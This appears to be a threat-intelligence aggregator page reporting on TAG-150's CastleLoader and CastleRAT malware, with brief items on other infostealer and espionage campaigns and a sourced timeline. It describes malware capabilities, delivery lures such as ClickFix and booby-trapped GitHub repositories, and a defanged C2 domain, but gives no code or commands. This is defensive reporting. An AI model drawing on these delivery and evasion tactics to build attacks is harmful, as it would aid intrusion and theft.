TAG-150 CastleLoader and CastleRAT malware operations
Malware Activity
Summary
Hide ▲
Show ▼
The TAG-150 malware activity now centers on CastleLoader and new CastleRAT variants (NightShadeC2) that researchers mapped across a broader MaaS infrastructure. The cluster has been active since at least March 2025, reached more than 1,600 attacks and nearly 470 infections by midsummer, and affected more than 400 mostly critical victims, including many United States government agencies. Delivery has included boobytrapped GitHub repositories, the ClickFix tactic, and fake-software websites, while Steam Community profiles and programsbookss[.]com have been used for dead-drop C2 resolution. The activity remains under active development, with both C and Python CastleRAT variants showing different feature sets and stealth behavior.
Related Happenings
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Vidar infostealer market rise and distribution expansion
Malware ActivityAbout this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Tropic Trooper trojanized SumatraPDF remote-access campaign
Campaign
First: 24.04.2026 12:29
Last: 24.04.2026 12:29
Sources 1
About this happening:
**Tropic Trooper** is running an active **campaign** that uses a **trojanized SumatraPDF** lure to plant **AdaptixC2 Beacon** and later abuse **VS Code tunnels** for remote access...
Tropic Trooper trojanized SumatraPDF remote-access campaign
CampaignAbout this happening: **Tropic Trooper** is running an active **campaign** that uses a **trojanized SumatraPDF** lure to plant **AdaptixC2 Beacon** and later abuse **VS Code tunnels** for remote access...
Torg Grabber browser-extension theft activity
Malware Activity
First: 25.03.2026 20:32
Last: 25.03.2026 20:32
Sources 1
About this happening:
The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
Torg Grabber browser-extension theft activity
Malware ActivityAbout this happening: The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
SloppyLemming spear-phishing campaign targeting Pakistan and Bangladesh
Campaign
First: 03.03.2026 08:53
Last: 03.03.2026 08:53
Sources 1
About this happening:
The **SloppyLemming** campaign is using **spear-phishing**, **PDF lures**, and **macro-enabled Excel documents** to target **government entities and critical infrastructure operat...
SloppyLemming spear-phishing campaign targeting Pakistan and Bangladesh
CampaignAbout this happening: The **SloppyLemming** campaign is using **spear-phishing**, **PDF lures**, and **macro-enabled Excel documents** to target **government entities and critical infrastructure operat...
Graphalgo malicious npm and PyPI RAT downloader packages
Malware Activity
First: 14.02.2026 00:35
Last: 14.02.2026 00:35
Sources 1
About this happening:
**Graphalgo** is a continuing **malware-delivery operation** that uses **fake companies**, **fake job interviews**, and **coding tests** to lure **JavaScript and Python developers...
Graphalgo malicious npm and PyPI RAT downloader packages
Malware ActivityAbout this happening: **Graphalgo** is a continuing **malware-delivery operation** that uses **fake companies**, **fake job interviews**, and **coding tests** to lure **JavaScript and Python developers...
Latest development: 29.04.2026 17:43
North Korean graphalgo operators use fake companies, fake job interviews, and coding tests on job-seeking platforms and social networks to lure developers into downloading GitHub-hosted assessment projects that carry malicious npm or PyPI dependencies and ultimately install a RAT. One front company, Blocmerce, registered an LLC in Florida in August 2025, and related GitHub organizations have been active since June 2025.
Timeline
-
05.09.2025 17:07 3 articles · 8mo ago
TAG-150 expands CastleLoader into CastleRAT
Initial DisclosureTAG-150 expands CastleLoader into CastleRAT, a remote access trojan available in Python and C variants that has been active since at least March 2025. The malware collects system information, downloads and executes additional payloads, executes commands via CMD and PowerShell, and the C variant adds keylogging, screenshot capture, file transfer, clipboard-based cryptocurrency clipping, and self-deletion; infections are commonly initiated through Cloudflare-themed ClickFix phishing attacks or fraudulent GitHub repositories, and the infrastructure uses Steam Community profiles and programsbookss[.]com for dead-drop resolution.
Show sources
- TAG-150 Develops CastleRAT in Python and C, Expanding CastleLoader Malware Operations — thehackernews.com — 05.09.2025 17:07
- TAG-150 Develops CastleRAT in Python and C, Expanding CastleLoader Malware Operations — thehackernews.com — 05.09.2025 17:07
- Secretive MaaS Group 'TAG-150' Develops Novel 'CastleRAT' — www.darkreading.com — 05.09.2025 21:28